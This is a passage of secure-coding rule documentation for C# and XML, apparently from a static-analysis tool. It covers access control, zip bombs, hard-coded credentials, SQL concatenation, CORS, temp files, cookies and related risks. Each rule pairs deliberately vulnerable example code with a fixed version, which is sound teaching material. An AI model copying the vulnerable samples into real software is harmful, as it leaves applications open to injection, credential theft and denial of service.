
To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Standards

csharpsquid:S4834

This rule is deprecated, and will eventually be removed.

The access control of an application must be properly implemented in order to restrict access to resources to authorized entities otherwise this could lead to vulnerabilities:

Granting correct permissions to users, applications, groups or roles and defining required permissions that allow access to a resource is sensitive, must therefore be done with care. For instance, it is obvious that only users with administrator privilege should be authorized to add/remove the administrator permission of another user.

Ask Yourself Whether

  • Granted permission to an entity (user, application) allow access to information or functionalities not needed by this entity.
  • Privileges are easily acquired (eg: based on the location of the user, type of device used, defined by third parties, does not require approval …​).
  • Inherited permission, default permission, no privileges (eg: anonymous user) is authorized to access to a protected resource.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

At minimum, an access control system should:

  • Use a well-defined access control model like RBAC or ACL.
  • Entities' permissions should be reviewed regularly to remove permissions that are no longer needed.
  • Respect the principle of least privilege ("an entity has access only the information and resources that are necessary for its legitimate purpose").

Sensitive Code Example

using System.Threading;
using System.Security.Permissions;
using System.Security.Principal;
using System.IdentityModel.Tokens;

class SecurityPrincipalDemo
{
    class MyIdentity : IIdentity // Sensitive, custom IIdentity implementations should be reviewed
    {
        // ...
    }

    class MyPrincipal : IPrincipal // Sensitive, custom IPrincipal implementations should be reviewed
    {
        // ...
    }
    [System.Security.Permissions.PrincipalPermission(SecurityAction.Demand, Role = "Administrators")] // Sensitive. The access restrictions enforced by this attribute should be reviewed.
    static void CheckAdministrator()
    {
        WindowsIdentity MyIdentity = WindowsIdentity.GetCurrent(); // Sensitive
        HttpContext.User = ...; // Sensitive: review all reference (set and get) to System.Web HttpContext.User
        AppDomain domain = AppDomain.CurrentDomain;
        domain.SetPrincipalPolicy(PrincipalPolicy.WindowsPrincipal); // Sensitive
        MyIdentity identity = new MyIdentity(); // Sensitive
        MyPrincipal MyPrincipal = new MyPrincipal(MyIdentity); // Sensitive
        Thread.CurrentPrincipal = MyPrincipal; // Sensitive
        domain.SetThreadPrincipal(MyPrincipal); // Sensitive

        // All instantiation of PrincipalPermission should be reviewed.
        PrincipalPermission principalPerm = new PrincipalPermission(null, "Administrators"); // Sensitive
        principalPerm.Demand();

        SecurityTokenHandler handler = ...;
        // Sensitive: this creates an identity.
        ReadOnlyCollection<ClaimsIdentity> identities = handler.ValidateToken(…);
    }

     // Sensitive: review how this function uses the identity and principal.
    void modifyPrincipal(MyIdentity identity, MyPrincipal principal)
    {
        // ...
    }
}

See

csharpsquid:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will compress irrelevant data (eg: a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data, in general the data compression ratio for most of the legit archives is 1 to 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in particular it’s not recommended to recursively expand archives (an entry of an archive could be also an archive).

Sensitive Code Example

using var zipToOpen = new FileStream(@"ZipBomb.zip", FileMode.Open);
using var archive = new ZipArchive(zipToOpen, ZipArchiveMode.Read);
foreach (ZipArchiveEntry entry in archive.Entries)
{
  entry.ExtractToFile("./output_onlyfortesting.txt", true); // Sensitive
}

Compliant Solution

int THRESHOLD_ENTRIES = 10000;
int THRESHOLD_SIZE = 1000000000; // 1 GB
double THRESHOLD_RATIO = 10;
int totalSizeArchive = 0;
int totalEntryArchive = 0;

using var zipToOpen = new FileStream(@"ZipBomb.zip", FileMode.Open);
using var archive = new ZipArchive(zipToOpen, ZipArchiveMode.Read);
foreach (ZipArchiveEntry entry in archive.Entries)
{
  totalEntryArchive ++;

  using (Stream st = entry.Open())
  {
    byte[] buffer = new byte[1024];
    int totalSizeEntry = 0;
    int numBytesRead = 0;

    do
    {
      numBytesRead = st.Read(buffer, 0, 1024);
      totalSizeEntry += numBytesRead;
      totalSizeArchive += numBytesRead;
      double compressionRatio = totalSizeEntry / entry.CompressedLength;

      if(compressionRatio > THRESHOLD_RATIO) {
        // ratio between compressed and uncompressed data is highly suspicious, looks like a Zip Bomb Attack
        break;
      }
    }
    while (numBytesRead > 0);
  }

  if(totalSizeArchive > THRESHOLD_SIZE) {
      // the uncompressed data size is too much for the application resource capacity
      break;
  }

  if(totalEntryArchive > THRESHOLD_ENTRIES) {
      // too much entries in this archive, can lead to inodes exhaustion of the system
      break;
  }
}

See

csharpsquid:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

string username = "admin";
string password = "Admin123"; // Sensitive
string usernamePassword  = "user=admin&password=Admin123"; // Sensitive
string url = "scheme://user:Admin123@domain.com"; // Sensitive

Compliant Solution

string username = "admin";
string password = GetEncryptedPassword();
string usernamePassword = string.Format("user={0}&password={1}", GetEncryptedUsername(), GetEncryptedPassword());
string url = $"scheme://{username}:{password}@domain.com";

string url2 = "http://guest:guest@domain.com"; // Compliant
const string Password_Property = "custom.password"; // Compliant

Exceptions

  • Issue is not raised when URI username and password are the same.
  • Issue is not raised when searched pattern is found in variable name and value.

See

csharpsquid:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

var urlHttp = "http://example.com";                 // Noncompliant
var urlFtp = "ftp://anonymous@example.com";         // Noncompliant
var urlTelnet = "telnet://anonymous@example.com";   // Noncompliant
using var smtp = new SmtpClient("host", 25); // Noncompliant, EnableSsl is not set
using var telnet = new MyTelnet.Client("host", port); // Noncompliant, rule raises Security Hotspot on any member containing "Telnet"

Compliant Solution

var urlHttps = "https://example.com";
var urlSftp = "sftp://anonymous@example.com";
var urlSsh = "ssh://anonymous@example.com";
using var smtp = new SmtpClient("host", 25) { EnableSsl = true };
using var ssh = new MySsh.Client("host", port);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

csharpsquid:S5693

Rejecting requests with significant content length is a good practice to control the network traffic intensity and thus resource consumption in order to prevents DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • lower or equal to 8mb for file uploads.
    • lower or equal to 2mb for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.

Sensitive Code Example

using Microsoft.AspNetCore.Mvc;

public class MyController : Controller
{
    [HttpPost]
    [DisableRequestSizeLimit] // Sensitive: No size  limit
    [RequestSizeLimit(10000000)] // Sensitive: 10MB is more than the recommended limit of 8MB
    public IActionResult PostRequest(Model model)
    {
    // ...
    }

    [HttpPost]
    [RequestFormLimits(MultipartBodyLengthLimit = 8000000)] // Sensitive: 10MB is more than the recommended limit of 8MB
    public IActionResult MultipartFormRequest(Model model)
    {
    // ...
    }
}

In Web.config:

<configuration>
    <system.web>
        <httpRuntime maxRequestLength="81920" executionTimeout="3600" />
        <!-- Sensitive: maxRequestLength is exprimed in KB, so 81920KB = 80MB  -->
    </system.web>
    <system.webServer>
        <security>
            <requestFiltering>
                <requestLimits maxAllowedContentLength="83886080" />
                <!-- Sensitive: maxAllowedContentLength is exprimed in bytes, so 83886080B = 80MB  -->
            </requestFiltering>
        </security>
    </system.webServer>
</configuration>

Compliant Solution

using Microsoft.AspNetCore.Mvc;

public class MyController : Controller
{
    [HttpPost]
    [RequestSizeLimit(8000000)] // Compliant: 8MB
    public IActionResult PostRequest(Model model)
    {
    // ...
    }

    [HttpPost]
    [RequestFormLimits(MultipartBodyLengthLimit = 8000000)] // Compliant: 8MB
    public IActionResult MultipartFormRequest(Model model)
    {
    // ...
    }
}

In Web.config:

<configuration>
    <system.web>
        <httpRuntime maxRequestLength="8192" executionTimeout="3600" />
        <!-- Compliant: maxRequestLength is exprimed in KB, so 8192KB = 8MB  -->
    </system.web>
    <system.webServer>
        <security>
            <requestFiltering>
                <requestLimits maxAllowedContentLength="8388608" />
                <!-- Comliant: maxAllowedContentLength is exprimed in bytes, so 8388608B = 8MB  -->
            </requestFiltering>
        </security>
    </system.webServer>
</configuration>

See

csharpsquid:S2077

Formatted SQL queries can be difficult to maintain, debug and can increase the risk of SQL injection when concatenating untrusted values into the query. However, this rule doesn’t detect SQL injections (unlike rule S3649), the goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sensitive Code Example

public void Foo(DbContext context, string query, string param)
{
    string sensitiveQuery = string.Concat(query, param);
    context.Database.ExecuteSqlCommand(sensitiveQuery); // Sensitive
    context.Query<User>().FromSql(sensitiveQuery); // Sensitive

    context.Database.ExecuteSqlCommand($"SELECT * FROM mytable WHERE mycol={value}", param); // Sensitive, the FormattableString is evaluated and converted to RawSqlString
    string query = $"SELECT * FROM mytable WHERE mycol={param}";
    context.Database.ExecuteSqlCommand(query); // Sensitive, the FormattableString has already been evaluated, it won't be converted to a parametrized query.
}

public void Bar(SqlConnection connection, string param)
{
    SqlCommand command;
    string sensitiveQuery = string.Format("INSERT INTO Users (name) VALUES (\"{0}\")", param);
    command = new SqlCommand(sensitiveQuery); // Sensitive

    command.CommandText = sensitiveQuery; // Sensitive

    SqlDataAdapter adapter;
    adapter = new SqlDataAdapter(sensitiveQuery, connection); // Sensitive
}

Compliant Solution

public void Foo(DbContext context, string query, string param)
{
    context.Database.ExecuteSqlCommand("SELECT * FROM mytable WHERE mycol=@p0", param); // Compliant, it's a parametrized safe query
}

See

csharpsquid:S6640

Using unsafe code blocks can lead to unintended security or stability risks.

unsafe code blocks allow developers to use features such as pointers, fixed buffers, function calls through pointers and manual memory management. Such features may be necessary for interoperability with native libraries, as these often require pointers. It may also increase performance in some critical areas, as certain bounds checks are not executed in an unsafe context.

unsafe code blocks aren’t necessarily dangerous, however, the contents of such blocks are not verified by the Common Language Runtime. Therefore, it is up to the programmer to ensure that no bugs are introduced through manual memory management or casting. If not done correctly, then those bugs can lead to memory corruption vulnerabilities such as stack overflows. unsafe code blocks should be used with caution because of these security and stability risks.

Ask Yourself Whether

  • There are any pointers or fixed buffers declared within the unsafe code block.

There is a risk if you answered yes to the question.

Recommended Secure Coding Practices

Unless absolutely necessary, do not use unsafe code blocks. If unsafe is used to increase performance, then the Span and Memory APIs may serve a similar purpose in a safe context.

If it is not possible to remove the code block, then it should be kept as short as possible. Doing so reduces risk, as there is less code that can potentially introduce new bugs. Within the unsafe code block, make sure that:

  • All type casts are correct.
  • Memory is correctly allocated and then released.
  • Array accesses can never go out of bounds.

Sensitive Code Example

public unsafe int SubarraySum(int[] array, int start, int end)  // Sensitive
{
    var sum = 0;

    // Skip array bound checks for extra performance
    fixed (int* firstNumber = array)
    {
        for (int i = start; i < end; i++)
            sum += *(firstNumber + i);
    }

    return sum;
}

Compliant Solution

public int SubarraySum(int[] array, int start, int end)
{
    var sum = 0;

    Span<int> span = array.AsSpan();
    for (int i = start; i < end; i++)
        sum += span[i];

    return sum;
}

See

csharpsquid:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples bellow). It also detects access to environment variables that point to publicly writable directories, e.g., TMP, TMPDIR and TEMP.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP
  • %USERPROFILE%\AppData\Local\Temp

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Out of the box, .NET is missing secure-by-design APIs to create temporary files. To overcome this, one of the following options can be used:

  • Use a dedicated sub-folder with tightly controlled permissions
  • Created temporary files in a publicly writable folder and make sure:
    • Generated filename is unpredictable
    • File is readable and writable only by the creating user ID
    • File descriptor is not inherited by child processes
    • File is destroyed as soon as it is closed

Sensitive Code Example

using var writer = new StreamWriter("/tmp/f"); // Sensitive
var tmp = Environment.GetEnvironmentVariable("TMP"); // Sensitive

Compliant Solution

var randomPath = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());

// Creates a new file with write, non inheritable permissions which is deleted on close.
using var fileStream = new FileStream(randomPath, FileMode.CreateNew, FileAccess.Write, FileShare.None, 4096, FileOptions.DeleteOnClose);
using var writer = new StreamWriter(fileStream);

See

csharpsquid:S5445

Temporary files are considered insecurely created when the file existence check is performed separately from the actual file creation. Such a situation can occur when creating temporary files using normal file handling functions or when using dedicated temporary file handling functions that are not atomic.

Why is this an issue?

Creating temporary files in a non-atomic way introduces race condition issues in the application’s behavior. Indeed, a third party can create a given file between when the application chooses its name and when it creates it.

In such a situation, the application might use a temporary file that it does not entirely control. In particular, this file’s permissions might be different than expected. This can lead to trust boundary issues.

What is the potential impact?

Attackers with control over a temporary file used by a vulnerable application will be able to modify it in a way that will affect the application’s logic. By changing this file’s Access Control List or other operating system-level properties, they could prevent the file from being deleted or emptied. They may also alter the file’s content before or while the application uses it.

Depending on why and how the affected temporary files are used, the exploitation of a race condition in an application can have various consequences. They can range from sensitive information disclosure to more serious application or hosting infrastructure compromise.

Information disclosure

Because attackers can control the permissions set on temporary files and prevent their removal, they can read what the application stores in them. This might be especially critical if this information is sensitive.

For example, an application might use temporary files to store users' session-related information. In such a case, attackers controlling those files can access session-stored information. This might allow them to take over authenticated users' identities and entitlements.

Attack surface extension

An application might use temporary files to store technical data for further reuse or as a communication channel between multiple components. In that case, it might consider those files part of the trust boundaries and use their content without additional security validation or sanitation. In such a case, an attacker controlling the file content might use it as an attack vector for further compromise.

For example, an application might store serialized data in temporary files for later use. In such a case, attackers controlling those files' content can change it in a way that will lead to an insecure deserialization exploitation. It might allow them to execute arbitrary code on the application hosting server and take it over.

How to fix it

Code examples

The following code example is vulnerable to a race condition attack because it creates a temporary file using an unsafe API function.

Noncompliant code example

using System.IO;

public void Example()
{
    var tempPath = Path.GetTempFileName();  // Noncompliant

    using (var writer = new StreamWriter(tempPath))
    {
        writer.WriteLine("content");
    }
}

Compliant solution

using System.IO;

public void Example()
{
    var randomPath = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());

    using (var fileStream = new FileStream(randomPath, FileMode.CreateNew, FileAccess.Write, FileShare.None, 4096, FileOptions.DeleteOnClose))
    using (var writer = new StreamWriter(fileStream))
    {
        writer.WriteLine("content");
    }
}

How does this work?

Applications should create temporary files so that no third party can read or modify their content. It requires that the files' name, location, and permissions are carefully chosen and set. This can be achieved in multiple ways depending on the applications' technology stacks.

Strong security controls

Temporary files can be created using unsafe functions and API as long as strong security controls are applied. Non-temporary file-handling functions and APIs can also be used for that purpose.

In general, applications should ensure that attackers can not create a file before them. This turns into the following requirements when creating the files:

  • Files should be created in a non-public directory.
  • File names should be unique.
  • File names should be unpredictable. They should be generated using a cryptographically secure random generator.
  • File creation should fail if a target file already exists.

Moreover, when possible, it is recommended that applications destroy temporary files after they have finished using them.

Here the example compliant code uses the Path.GetTempPath and Path.GetRandomFileName functions to generate a unique random file name. The file is then open with the FileMode.CreateNew option that will ensure the creation fails if the file already exists. The FileShare.None option will additionally prevent the file from being opened again by any process. To finish, this code ensures the file will get destroyed once the application has finished using it with the FileOptions.DeleteOnClose option.

Resources

Documentation

  • OWASP - Insecure Temporary File

Standards

  • OWASP - Top 10 2021 - A01:2021 - Broken Access Control
  • OWASP - Top 10 2017 - A9:2017 - Using Components with Known Vulnerabilities
  • MITRE - CWE-377: Insecure Temporary File
  • MITRE - CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
csharpsquid:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' passwords and salts couple might be low depending on the salt size. The shorter the salt, the higher the collision probability. In any case, using longer, cryptographically secure salt should be preferred.

How to fix it in .NET

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

using System.Security.Cryptography;

public static void hash(string password)
{
    var salt = Encoding.UTF8.GetBytes("salty");
    var hashed = new Rfc2898DeriveBytes(password, salt); // Noncompliant
}

Compliant solution

using System.Security.Cryptography;

public static void hash(string password)
{
    var hashed = new Rfc2898DeriveBytes(password, 16);
}

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

In the case of the code sample, the class automatically takes care of generating a secure salt if none is specified.

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
csharpsquid:S6444

Not specifying a timeout for regular expressions can lead to a Denial-of-Service attack. Pass a timeout when using System.Text.RegularExpressions to process untrusted input because a malicious user might craft a value for which the evaluation lasts excessively long.

Ask Yourself Whether

  • the input passed to the regular expression is untrusted.
  • the regular expression contains patterns vulnerable to catastrophic backtracking.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to specify a matchTimeout when executing a regular expression.
  • Make sure regular expressions are not vulnerable to Denial-of-Service attacks by reviewing the patterns.
  • Consider using a non-backtracking algorithm by specifying RegexOptions.NonBacktracking.

Sensitive Code Example

public void RegexPattern(string input)
{
    var emailPattern = new Regex(".+@.+", RegexOptions.None);
    var isNumber = Regex.IsMatch(input, "[0-9]+");
    var isLetterA = Regex.IsMatch(input, "(a+)+");
}

Compliant Solution

public void RegexPattern(string input)
{
    var emailPattern = new Regex(".+@.+", RegexOptions.None, TimeSpan.FromMilliseconds(100));
    var isNumber = Regex.IsMatch(input, "[0-9]+", RegexOptions.None, TimeSpan.FromMilliseconds(100));
    var isLetterA = Regex.IsMatch(input, "(a+)+", RegexOptions.NonBacktracking); // .Net 7 and above
    AppDomain.CurrentDomain.SetData("REGEX_DEFAULT_MATCH_TIMEOUT", TimeSpan.FromMilliseconds(100)); // process-wide setting
}

See

csharpsquid:S4036

When executing an OS command and unless you specify the full path to the executable, then the locations in your application’s PATH environment variable will be searched for the executable. That search could leave an opening for an attacker if one of the elements in PATH is a directory under his control.

Ask Yourself Whether

  • The directories in the PATH environment variable may be defined by not trusted entities.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Fully qualified/absolute path should be used to specify the OS command to execute.

Sensitive Code Example

Process p = new Process();
p.StartInfo.FileName = "binary"; // Sensitive

Compliant Solution

Process p = new Process();
p.StartInfo.FileName = @"C:\Apps\binary.exe"; // Compliant

See

csharpsquid:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:

Same origin policy in browsers prevents, by default and for security-reasons, a javascript frontend to perform a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers in response, called CORS, that act like directives for the browser and change the access control policy / relax the same origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

ASP.NET Core MVC:

[HttpGet]
public string Get()
{
    Response.Headers.Add("Access-Control-Allow-Origin", "*"); // Sensitive
    Response.Headers.Add(HeaderNames.AccessControlAllowOrigin, "*"); // Sensitive
}
public void ConfigureServices(IServiceCollection services)
{
    services.AddCors(options =>
    {
        options.AddDefaultPolicy(builder =>
        {
            builder.WithOrigins("*"); // Sensitive
        });

        options.AddPolicy(name: "EnableAllPolicy", builder =>
        {
            builder.WithOrigins("*"); // Sensitive
        });

        options.AddPolicy(name: "OtherPolicy", builder =>
        {
            builder.AllowAnyOrigin(); // Sensitive
        });
    });

    services.AddControllers();
}

ASP.NET MVC:

public class HomeController : ApiController
{
    public HttpResponseMessage Get()
    {
        var response = HttpContext.Current.Response;

        response.Headers.Add("Access-Control-Allow-Origin", "*"); // Sensitive
        response.Headers.Add(HeaderNames.AccessControlAllowOrigin, "*"); // Sensitive
        response.AppendHeader(HeaderNames.AccessControlAllowOrigin, "*"); // Sensitive
    }
}
[EnableCors(origins: "*", headers: "*", methods: "GET")] // Sensitive
public HttpResponseMessage Get() => new HttpResponseMessage()
{
    Content = new StringContent("content")
};

User-controlled origin:

String origin = Request.Headers["Origin"];
Response.Headers.Add("Access-Control-Allow-Origin", origin); // Sensitive

Compliant Solution

ASP.NET Core MVC:

[HttpGet]
public string Get()
{
    Response.Headers.Add("Access-Control-Allow-Origin", "https://trustedwebsite.com"); // Safe
    Response.Headers.Add(HeaderNames.AccessControlAllowOrigin, "https://trustedwebsite.com"); // Safe
}
public void ConfigureServices(IServiceCollection services)
{
    services.AddCors(options =>
    {
        options.AddDefaultPolicy(builder =>
        {
            builder.WithOrigins("https://trustedwebsite.com", "https://anothertrustedwebsite.com"); // Safe
        });

        options.AddPolicy(name: "EnableAllPolicy", builder =>
        {
            builder.WithOrigins("https://trustedwebsite.com"); // Safe
        });
    });

    services.AddControllers();
}

ASP.Net MVC:

public class HomeController : ApiController
{
    public HttpResponseMessage Get()
    {
        var response = HttpContext.Current.Response;

        response.Headers.Add("Access-Control-Allow-Origin", "https://trustedwebsite.com");
        response.Headers.Add(HeaderNames.AccessControlAllowOrigin, "https://trustedwebsite.com");
        response.AppendHeader(HeaderNames.AccessControlAllowOrigin, "https://trustedwebsite.com");
    }
}
[EnableCors(origins: "https://trustedwebsite.com", headers: "*", methods: "GET")]
public HttpResponseMessage Get() => new HttpResponseMessage()
{
    Content = new StringContent("content")
};

User-controlled origin validated with an allow-list:

String origin = Request.Headers["Origin"];

if (trustedOrigins.Contains(origin))
{
    Response.Headers.Add("Access-Control-Allow-Origin", origin);
}

See

csharpsquid:S2092

When a cookie is protected with the secure attribute set to true it will not be send by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is for instance a session-cookie not designed to be sent over non-HTTPS communication.
  • it’s not sure that the website contains mixed content or not (ie HTTPS everywhere or not)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPs everywhere so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session-cookies.

Sensitive Code Example

When the HttpCookie.Secure property is set to false then the cookie will be send during an unencrypted HTTP request:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
myCookie.Secure = false; //  Sensitive: a security-sensitive cookie is created with the secure flag set to false

The default value of Secure flag is false, unless overwritten by an application’s configuration file:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
//  Sensitive: a security-sensitive cookie is created with the secure flag not defined (by default set to false)

Compliant Solution

Set the HttpCookie.Secure property to true:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
myCookie.Secure = true; // Compliant

Or change the default flag values for the whole application by editing the Web.config configuration file:

<httpCookies httpOnlyCookies="true" requireSSL="true" />
  • the requireSSL attribute corresponds programmatically to the Secure field.
  • the httpOnlyCookies attribute corresponds programmatically to the httpOnly field.

See

xml:S3355

Why is this an issue?

Every filter defined in web.xml file should be used in a <filter-mapping> element. Otherwise such filters are not invoked.

Noncompliant code example

  <filter>
     <filter-name>DefinedNotUsed</filter-name>
     <filter-class>com.myco.servlet.ValidationFilter</filter-class>
  </filter>

Compliant solution

  <filter>
     <filter-name>ValidationFilter</filter-name>
     <filter-class>com.myco.servlet.ValidationFilter</filter-class>
  </filter>

  <filter-mapping>
     <filter-name>ValidationFilter</filter-name>
     <url-pattern>/*</url-pattern>
  </filter-mapping>

Resources

xml:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

Spring-social-twitter secrets can be stored inside a xml file:

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="
